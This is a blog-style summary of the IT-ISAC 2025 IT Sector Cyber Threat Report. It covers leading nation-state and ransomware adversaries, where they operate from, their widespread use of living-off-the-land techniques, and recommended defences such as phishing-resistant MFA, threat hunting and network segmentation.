Examining the 2025 Cyber Threat Landscape: Insights from the IT-ISAC Threat Report

In an era where digital infrastructure is regularly threatened by cyber attacks, information sharing has never been more vital. By fostering a collaborative environment for threat intelligence, the IT-ISAC empowers organizations to move beyond reactive security and toward proactive resilience. The ISAC’s 2025 IT Sector Cyber Threat Report reveals a dynamic environment of nation-state espionage and organized cybercrime, demanding a more sophisticated approach to defense.

Informing the analysis in the report is the IT-ISAC’s Predictive Adversary Scoring System (PASS). Developed in collaboration with member organizations, PASS evaluates over 330 unique adversaries across metrics like recent activity, the frequency of targeting the IT sector, and the sophistication of their tactics, assigning a numerical threat score. This system transforms raw intelligence into actionable information, ensuring that security teams are focused on the actors that pose the most significant risk to their specific sub-sectors.

Top Adversaries Targeting the IT Sector

The IT sector remains a target for high-capability actors. Leading the list of threats are the Lazarus Group and Famous Chollima, both nation-state actors with near-perfect scores in the PASS system due to their focus on the industry. Following closely are sophisticated entities like APT35 and the ransomware-focused Warlock.

These threats are characterized by their patience and diverse motivations. While groups like APT41 and Sandworm maintain high rankings through state-sponsored operations, others like LockBit 5.0 and the Scattered Lapsus$ Hunters represent the growing danger of highly organized, financially motivated cybercrime syndicates. The diversity of these actors underscores that the IT sector must defend against a spectrum of threats that includes both geopolitical disruption and extortion.

A Global Web of Risk

The geographic origin of these threats provides critical context for understanding adversary intent. Russia remains the most significant source of cyber activity, accounting for nearly half of all observed threat actors at 48.4%. This ecosystem is incredibly varied, comprising everything from state-affiliated espionage to opportunistic ransomware gangs.

China follows as the second most frequent point of origin, representing 29% of actors. A notable shift in Chinese tactics is the move toward long-term persistence; rather than simple smash and grab data theft, these actors are increasingly embedding themselves within telecommunications and cloud environments to maintain a listening post for extended periods.

The landscape is rounded out by actors from Iran, North Korea, and several other nations. While smaller in total volume, their impact is no less significant. North Korean groups, for instance, have become pioneers in fraudulent schemes, including the use of remote IT worker identities to infiltrate companies and generate illicit revenue through cryptocurrency theft. The IT-ISAC CSaaS CISO SIG has written a white paper on this topic and how hiring departments can mitigate it, available to read here.

Current Tactics

Understanding how these groups operate is just as crucial as knowing who they are. The 2025 findings highlight a universal trend: the use of living-off-the-land (LOTL) techniques. Remarkably, 100% of the 77 active adversaries identified this year utilized readily available system tools or native software to carry out their attacks. By using legitimate tools like PowerShell or WMI, attackers can blend in with normal administrative activity, making them much harder to detect than traditional malware.

Furthermore, over 96% of actors modified existing malware to evade signatures, and nearly 85% demonstrated the ability to develop entirely custom tools. Adversaries are now focusing on staying low, prioritizing defense evasion and lengthy persistence over immediate disruption.

Building a Resilient Defense

To counter these sophisticated threats, organizations must shift their focus toward behavioral detection and zero-trust principles. A primary line of defense remains the implementation of phishing-resistant multi-factor authentication (MFA). Monitoring for anomalous usage of native system tools is also essential to catching LOTL attacks before they escalate.

Resilience requires a change in mindset regarding breaches; organizations should assume a state of compromise and engage in continuous threat hunting rather than waiting for an automated alert. This includes segmenting IT and operational technology (OT) environments to prevent lateral movement, and maintaining offline backups. 

Most importantly, no organization should navigate these waters alone. Joining a community like the IT-ISAC acts as a force multiplier, providing access to early warnings and a shared pool of knowledge that makes the entire sector stronger and more prepared for whatever 2026 may bring.

Want to read the full analysis? Check out our public version on our Resources Page. IT-ISAC members can access the extended member report via Notion or by contacting our team at membership@it-isac.org.